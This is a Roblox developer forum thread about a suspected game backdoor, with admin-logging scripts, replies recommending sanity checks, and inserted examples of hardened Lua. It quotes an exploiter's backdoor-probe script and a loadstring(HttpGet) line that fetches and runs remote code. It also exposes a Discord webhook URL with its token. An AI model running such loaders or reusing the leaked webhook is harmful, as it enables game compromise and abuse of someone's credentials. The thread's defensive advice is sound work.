Help with weird backdoor 'exploit'

I am new to the dev forum, please tell me if this is the wrong section to post this in
A few days ago, I tried to make an admin command usage detector, to see what my mods are doing to ensure they aren’t abusing or anything. Well, I couldn’t figure out how to make it work, but today I got a few extremely suspicious notifications from my admin command detector, here they are:

1. The command -- If all players jump when executed, it means the game is backdoored! 
for i,v in pairs(game:GetService('Players'):GetPlayers()) do
if v.Character ~= nil and v.Character:IsA("Model") and v.Character:FindFirstChildWhichIsA("Humanoid") then
 v.Character:FindFirstChildWhichIsA("Humanoid").Jump = true 
end
end
----- CHANGELOGS ----- -- v1.0.0 | First publish. -- v1.1.0 | New acquire feature V1. ----- CHANGELOGS ----- 
was used by Arthur_gg054

2. [2:20 PM]

The command 
Instance.new("Model",workspace).Name="ERJGOGEFWUKMPHKRAFBKMMUBCCQNQLCCXAONDVHWFLGLSAVIBSCKGNUMAVIBXNGR"
was used by Arthur_gg054

3. [2:21 PM]

The command loadstring(game:HttpGet("not showing the link to this exploit on here"))()
was used by Arthur_gg054

This same thing was used by another player as well, and I don’t know why it’s picking this up and I also don’t know if my game is backdoored. Here is the admin command detector as well:

local rem = game:GetService('ReplicatedStorage'):WaitForChild('ALLREMBINDS'):WaitForChild('usedcomandthangg')
local hook = 'https://discordapp.com/api/webhooks/1332167858452430910/YhyZLx3r02B9W2JSpItdLydpB9SPweNZyhq33YDUKp66x2QCm5pfMO6cTiwm8t0Dv0LR'
local htpserv = game:GetService('HttpService')

rem.OnServerEvent:Connect(function(playerwhousedit, commandused)
	-- Debugging outputs
	print("Command used: ", commandused)
	print("Player who used the command: ", playerwhousedit.Name)

	-- Function to send the report
	local function sendreport(cmd, plr)
		local data = {
			['content'] = 'The command ' .. cmd .. ' was used by ' .. plr.Name
		}
		data = htpserv:JSONEncode(data)

		-- Try to send the report
		local success, err = pcall(function()
			htpserv:PostAsync(hook, data)
		end)

		if not success then
			warn("Failed to send report: " .. tostring(err))
		end
	end

	-- Call function with the correct parameters
	sendreport(commandused, playerwhousedit)
end)



if anyone could help or tell me what this stuff means, that would be great!

8 Likes

Move this to #help-and-feedback:scripting-support

Also, since you’re new, I’d like to tell you that you don’t actually have to delete the whole topic, just edit your post, and above the title where it says “Development Discussion” change it to “Help and Feedback - Scripting support”

4 Likes
  1. Do not show your Discord webhook link here, anyone can use it.
  2. You shouldn’t use a remote script with no sanity check like that, any exploiter can abuse it too.
  3. If Arthur_gg054 is an admin, talk with them and advise them to not use those scripts. The first two are harmless, the loadstring can be dangerous. If Arthur_gg054 is not an admin, remove the admin system you are using and use a better trusted one, and just stop adding anyone as admin. If they run malicious code with those commands, it can end up giving admin permissions to malicious players.

They probably know the game may have a vulnerability and are trying to see if it works, but judging by your code not having sanity checks, I’d say the scripts they are “running” could actually NOT be running. You need to implement the command check on the server exactly where the command function is used, or something similar, to make sure all checks passed and the command is executing.

2 Likes

If the code sent through as a command is allowed to run, then you’re in danger and should disable the admin menu immediately.
If you want to test it, just run that jump script through your menu, if you jump, then disable the menu. If not, you’re safe.

You should add a lot more security to the remote if that’s the whole script.

Anyone who decides to exploit can fire the remote event with bogus info, and can do anything.
If your game is on a group, then use group ranks to determine who can and can’t use the event.

local yourGroupId = 00000000 --// The ID for your group
local AdminRank = 253 --// The number rank of the admin role in your group
rem.OnServerEvent:Connect(function(playerwhousedit, commandused)
	if playerwhousedit:GetRankInGroup(yourGroupId) < AdminRank then return end -- anyone below the admin rank is ignored here, so only admins can use the menu
end)

If you aren’t using a group though, you can just use UserIds instead.

local idList = { --// List of UserIds, people who can use the admin panel.
    0000000000,
    0000000000,
    0000000000
}

--// In the event connection:
if not table.find(idList, playerwhousedit.UserId) then return end

A small downside to this system is that new admins can only use the system in newer servers, but you could simply use datastores to fix the problem.

To answer your question, the most they could do if you scripted your system very poorly and allowed code to be executed is that a few servers would be backdoored.

Given that it’s very bad if they are backdoored, it’s a simple fix of shutting down those servers, reverting any changes anyone made, and disabling the admin system until it’s fixed.

Looking at how your system works though, the commandused variable is simply supposed to be a string that then gets passed to call a function of the same name, which is a decent system.
The lack of security though makes it a bad system, as anyone can do anything. You could have a random player ban an entire server.

And also, if the people who used it are admins, revoke their admin, if not, just ban them permanently.

3 Likes
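Putting the two suggestions above together (UserId/group-rank allowlist on the remote, plus never trusting the string the client sends), here is a hardened version of the logging handler as an added example. It is not code from this thread, from HD Admin or from Roblox; the webhook URL, the UserIds and the group id/rank are placeholders, and `rem` is assumed to be the same RemoteEvent the original post uses.

```lua
-- Server Script (ServerScriptService). Added example: a sanity-checked version of
-- the "command used" logger. All constants below are placeholders.
local Players = game:GetService("Players")
local ReplicatedStorage = game:GetService("ReplicatedStorage")
local HttpService = game:GetService("HttpService")

local rem = ReplicatedStorage:WaitForChild("ALLREMBINDS"):WaitForChild("usedcomandthangg")

-- Placeholder only; a real webhook URL is a secret, keep it out of shared code and rotate it if leaked
local WEBHOOK_URL = "https://discord.com/api/webhooks/<id>/<token>"

-- Allowlist: only accept reports about accounts that are actually allowed to run admin commands
local ADMIN_USER_IDS = { [1] = true }   -- placeholder UserIds
local GROUP_ID, ADMIN_RANK = 0, 253     -- placeholders; GROUP_ID = 0 skips the group check

-- Commands worth logging (the same keywords the LocalScript looks for)
local LOGGED_COMMANDS = { "fly", "kick", "ban", "fling", "kill", "size", "punish", "respawn", "re" }

local MAX_COMMAND_LENGTH = 64
local MIN_SECONDS_BETWEEN_REPORTS = 2
local lastReportAt = {} -- [UserId] = os.clock() of the last accepted report

local function isAdmin(player)
	if ADMIN_USER_IDS[player.UserId] then
		return true
	end
	if GROUP_ID ~= 0 then
		-- GetRankInGroup can error (e.g. group service hiccup); treat an error as "not admin"
		local ok, rank = pcall(player.GetRankInGroup, player, GROUP_ID)
		return ok and rank >= ADMIN_RANK
	end
	return false
end

-- Returns the canonical command name when the payload is a well-formed ";command",
-- otherwise nil. Anything that is not a short string starting with ';' is rejected,
-- so a pasted script such as loadstring(...) never reaches the webhook.
local function sanitizeCommand(payload)
	if typeof(payload) ~= "string" then return nil end
	if #payload == 0 or #payload > MAX_COMMAND_LENGTH then return nil end
	if payload:sub(1, 1) ~= ";" then return nil end
	local name = payload:sub(2):lower():match("^(%a+)")
	if not name then return nil end
	for _, allowed in ipairs(LOGGED_COMMANDS) do
		if name == allowed then
			return name
		end
	end
	return nil
end

local function sendReport(text)
	local body = HttpService:JSONEncode({ content = text })
	local ok, err = pcall(HttpService.PostAsync, HttpService, WEBHOOK_URL, body, Enum.HttpContentType.ApplicationJson)
	if not ok then
		warn("Failed to send report: " .. tostring(err))
	end
end

rem.OnServerEvent:Connect(function(player, payload)
	-- 1. Only admins may generate a log line; anyone else firing the remote is dropped and noted
	if not isAdmin(player) then
		warn(("Dropped remote fire from non-admin %s (%d)"):format(player.Name, player.UserId))
		return
	end
	-- 2. Never concatenate raw client data into the message; normalise it first
	local command = sanitizeCommand(payload)
	if not command then
		warn(("Dropped malformed command payload from %s"):format(player.Name))
		return
	end
	-- 3. Rate-limit per player so a compromised admin client cannot flood the webhook
	local now = os.clock()
	local last = lastReportAt[player.UserId]
	if last and now - last < MIN_SECONDS_BETWEEN_REPORTS then
		return
	end
	lastReportAt[player.UserId] = now

	sendReport(("Admin %s (%d) used ;%s"):format(player.Name, player.UserId, command))
end)

Players.PlayerRemoving:Connect(function(player)
	lastReportAt[player.UserId] = nil
end)
```

Note what this does and does not prove: a report that passes these checks still only means an admin's client claimed a command was typed. Whether the command actually executed is only known to the server-side admin system, which is why the check belongs where the command runs, as the earlier reply says.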

I think I worded this very poorly, I am using HD Admin. This is just a script that detects when the player chats and if the message starts with ‘;’ and contains a certain keyword like ‘kill’ or ‘kick’ or something it fires this remote event. I have sanity checks on all of my remotes, so it’s pretty difficult to exploit in my game. I’m just wondering how that script could have gone through the admin command checker? Here is the LocalScript that fires the RemoteEvent whenever a command is detected:

repeat task.wait() until game:IsLoaded()
local rs = game:GetService('ReplicatedStorage')
local remotes = rs:WaitForChild('ALLREMBINDS')
local oncmdremote = remotes:WaitForChild('usedcomandthangg')
local player = game.Players.LocalPlayer

local stuffforstringgssssss = {
	'fly',
	'kick',
	'ban',
	'fling',
	'kill',
	'size',
	'punish',
	'respawn',
	're',
}

local function onchatted(message)
	local lowered = string.lower(message)
	for _, word in pairs(stuffforstringgssssss) do
		-- plain find (4th argument true) so the keyword is not interpreted as a pattern
		if string.find(lowered, ';'..word, 1, true) then
			-- Do not pass `player` here: the server already receives the sender as the
			-- first argument of OnServerEvent, so the command string must be the only argument
			oncmdremote:FireServer(';'..word)
		end
	end
end

local TextChatService = game:GetService("TextChatService")
TextChatService.MessageReceived:Connect(function(message)
	-- System messages have no TextSource, so guard against nil before reading UserId
	if message.TextSource and message.TextSource.UserId == player.UserId then
		onchatted(message.Text)
	end
end)
1 Like

Alright, I think I figured it out whenever this guy found the remote and said f you in the Discord through the bot. I need to add sanity checks to the admin command usage checker. I also figured out that the reason it is logging these is because the scripts are using ; to separate lines (I think).

2 Likes

Are you sure those scripts are being executed? And if they are actually being executed, are you using the official HD Admin by ForeverHD? (this one: https://create.roblox.com/store/asset/857927023/HD-Admin)

Also, please get a new Discord Webhook URL as it can be used by anyone who has it now.

2 Likes

I’m quite sure, I don’t see why else that would pop up. Also yes, I’m using the official HD Admin.

2 Likes

Also, I banned one of the exploiters :smiley:

3 Likes

They probably thought firing the remote would execute commands / scripts then, instead they sent logs to your webhook.

As long as there was nothing happening in-game and all you got was logs, then it’d be safe to assume your game isn’t backdoored and it’s just that you’re lacking sanity checks in the log script.

I’m not sure how you detect if someone is a staff member with HD Admin as I’ve not used the system, but in the meantime you can make a sanity check with @Chark_Proto’s suggestion.

2 Likes

Anyone chatting anything with “;” would get logged, it doesn’t check for admins only. The logs you received aren’t really scripts getting executed.

2 Likes
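The point made in the last few replies is that the logs came from a RemoteEvent any client can fire, so they prove nothing about what ran. One way to remove that trust boundary entirely is to log from the server, where chat is observable without a remote. The following is an added example, not code from this thread or from HD Admin; it assumes `Player.Chatted` fires on the server for TextChatService messages, and the webhook URL and staff UserIds are placeholders. It also parses the prefix strictly (the message must start with `;`), which is why a pasted script that merely contains a `;` somewhere would not be counted as a command.

```lua
-- Server Script (ServerScriptService). Added example: server-side admin command
-- usage logging with no RemoteEvent for a client to fire. Constants are placeholders.
local Players = game:GetService("Players")
local HttpService = game:GetService("HttpService")

local WEBHOOK_URL = "https://discord.com/api/webhooks/<id>/<token>" -- placeholder secret
local ADMIN_USER_IDS = { [1] = true }                               -- placeholder staff UserIds
local PREFIX = ";"
local LOGGED_COMMANDS = {
	fly = true, kick = true, ban = true, fling = true, kill = true,
	size = true, punish = true, respawn = true, re = true,
}

-- Parse a chat line. Returns commandName, argumentText only when the message is
-- exactly ";command ..." (prefix at position 1); otherwise nil.
local function parseCommand(message)
	if typeof(message) ~= "string" or message:sub(1, #PREFIX) ~= PREFIX then
		return nil
	end
	local name, rest = message:sub(#PREFIX + 1):match("^(%a+)%s*(.*)$")
	if not name then
		return nil
	end
	name = name:lower()
	if not LOGGED_COMMANDS[name] then
		return nil
	end
	-- Flatten newlines and cap the length before the text goes into a log line
	rest = rest:gsub("[\r\n]", " "):sub(1, 100)
	return name, rest
end

local function sendReport(text)
	local body = HttpService:JSONEncode({ content = text })
	local ok, err = pcall(HttpService.PostAsync, HttpService, WEBHOOK_URL, body, Enum.HttpContentType.ApplicationJson)
	if not ok then
		warn("Failed to send report: " .. tostring(err))
	end
end

local function onChatted(player, message)
	local name, args = parseCommand(message)
	if not name then
		return
	end
	if not ADMIN_USER_IDS[player.UserId] then
		-- A non-admin typing an admin command does nothing in-game; note it locally only
		warn(("Non-admin %s (%d) typed ;%s"):format(player.Name, player.UserId, name))
		return
	end
	sendReport(("Admin %s (%d) used ;%s %s"):format(player.Name, player.UserId, name, args))
end

local function hookPlayer(player)
	player.Chatted:Connect(function(message)
		onChatted(player, message)
	end)
end

Players.PlayerAdded:Connect(hookPlayer)
-- Players already present when this script starts (e.g. after a script reload)
for _, player in ipairs(Players:GetPlayers()) do
	hookPlayer(player)
end
```

Because nothing here is reachable from the client, an exploiter cannot forge a log entry at all; the only remaining way to produce a line is for an allowlisted account to actually type the command in chat.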

This might be true, but I’m pretty sure I made it so it only fires if it also includes a certain keyword after ;

1 Like

This topic was automatically closed 14 days after the last reply. New replies are no longer allowed.